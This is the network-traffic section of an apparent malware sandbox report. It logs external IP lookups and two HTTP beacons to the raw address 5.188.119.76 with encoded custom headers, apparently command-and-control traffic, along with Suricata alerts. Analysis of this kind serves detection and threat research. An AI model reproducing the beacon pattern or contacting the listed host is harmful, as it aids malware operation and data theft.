Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
checkip.amazonaws.com | 52.19.9.35 | |
ip-api.com | 208.95.112.1 | |
UDP Requests
- 192.168.56.101:55871 -> 164.124.101.2:53
- 192.168.56.101:57609 -> 164.124.101.2:53
- 192.168.56.101:60131 -> 164.124.101.2:53
- 192.168.56.101:61681 -> 164.124.101.2:53
- 192.168.56.101:62062 -> 164.124.101.2:53
- 192.168.56.101:137 -> 192.168.56.255:137
- 192.168.56.101:138 -> 192.168.56.255:138
- 192.168.56.101:49152 -> 239.255.255.250:3702
- 192.168.56.101:61684 -> 239.255.255.250:1900
- 52.231.114.183:123 -> 192.168.56.101:123
HTTP Requests
GET 200 http://checkip.amazonaws.com/
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (Compatible; Windows NT 5.1; MSIE 6.0) (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: checkip.amazonaws.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2022 00:12:44 GMT
Server: lighttpd/1.4.53
Content-Length: 16
Connection: keep-alive
GET 200 http://ip-api.com/json/175.208.134.150
Request:
GET /json/175.208.134.150 HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2022 00:12:43 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 271
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
GET 200 http://checkip.amazonaws.com/
Request:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (Compatible; Windows NT 5.1; MSIE 6.0) (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: checkip.amazonaws.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2022 00:13:12 GMT
Server: lighttpd/1.4.53
Content-Length: 16
Connection: keep-alive
GET 200 http://ip-api.com/json/175.208.134.150
Request:
GET /json/175.208.134.150 HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2022 00:13:11 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 271
Access-Control-Allow-Origin: *
X-Ttl: 31
X-Rl: 43
GET 200 http://5.188.119.76/updhdl?method=get
Request:
GET /updhdl?method=get HTTP/1.1
tail: oE//yx1laZBxrph/O8pYH/+3x8msWjl9n+mpvOu0tj9WY0ZpnPcjqPdqTKxgpq4p
ua: bYUujve5vug9ACbT6Ossqqs5iTyZ9vXAQztNH7TZUKLwjNeLDGw7GJBGPwrDikvfage1YU9mvUk6vakl0060ZcDzSE3Q57ndYkqfIE+H/Wm9Ddhbp25qDLzh+I6xvMc7F6M2I/2Uk1OgB+z+xX5u7hOKLIbvVu8bmvK6Q77Uzjk0YBNfUr53M7oN2PEuY999VaJG60vJYYI7SVYFPSNZNBWOSzPRUVYykdQRqOEPfHWomy6N8UcNHoT8sgKoLbyzf9/0QmfgHrRJZ/xSEQyICAMDpBrvLN8zA228/FBP548t6QEeXn0mMRUfZpXm0HQpOVwKoMjAb2/nV+38Vlz2TjkXDAhQe9xlWdFs2VJYzVCY2b0i7tKgWjPc0uKrDJOHM4o/yYt/qxNZWnZXcc0O2JFHJfB4eq5nLbS3O5Qm6jh2FwWFT+95L27qGDqJELLSJp8FZtDpEpHhvBLACKa/MHjy9OBxodu8eICUFN5Ly0M=
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (Compatible; Windows NT 5.1; MSIE 6.0) (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: 5.188.119.76
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2022 00:13:17 GMT
Content-Length: 16
Content-Type: application/octet-stream
GET 200 http://5.188.119.76/updhdl?method=get
Request:
GET /updhdl?method=get HTTP/1.1
tail: iwhPS9w8eiN9lctJ1gpvvihQJEkvdf1XZwax4t6qeiUBXZkZXwoat+St/eKN88iN
ua: bYUujve5vug9ACbT6Ossqqs5iTyZ9vXAQztNH7TZUKLwjNeLDGw7GJBGPwrDikvfage1YU9mvUk6vakl0060ZcDzSE3Q57ndYkqfIE+H/Wm9Ddhbp25qDLzh+I6xvMc7F6M2I/2Uk1OgB+z+xX5u7hOKLIbvVu8bmvK6Q77Uzjk0YBNfUr53M7oN2PEuY999VaJG60vJYYI7SVYFPSNZNBWOSzPRUVYykdQRqOEPfHWomy6N8UcNHoT8sgKoLbyzf9/0QmfgHrRJZ/xSEQyICAMDpBrvLN8zA228/FBP548t6QEeXn0mMRUfZpXm0HQpOVwKoMjAb2/nV+38Vlz2TjkXDAhQe9xlWdFs2VJYzVCY2b0i7tKgWjPc0uKrDJOHM4o/yYt/qxNZWnZXcc0O2JFHJfB4eq5nLbS3O5Qm6jhUmk+zVp4gmnfmgk/jlR+ofzta/zH2TPVe6YBj/s/EsspHowT2R66C90YS+G272dw=
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (Compatible; Windows NT 5.1; MSIE 6.0) (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: 5.188.119.76
Response:
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2022 00:14:17 GMT
Content-Length: 16
Content-Type: application/octet-stream
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49167 -> 208.95.112.1:80 | 2022082 | ET POLICY External IP Lookup ip-api.com | Device Retrieving External IP Address Detected |
TCP 192.168.56.101:49176 -> 208.95.112.1:80 | 2022082 | ET POLICY External IP Lookup ip-api.com | Device Retrieving External IP Address Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts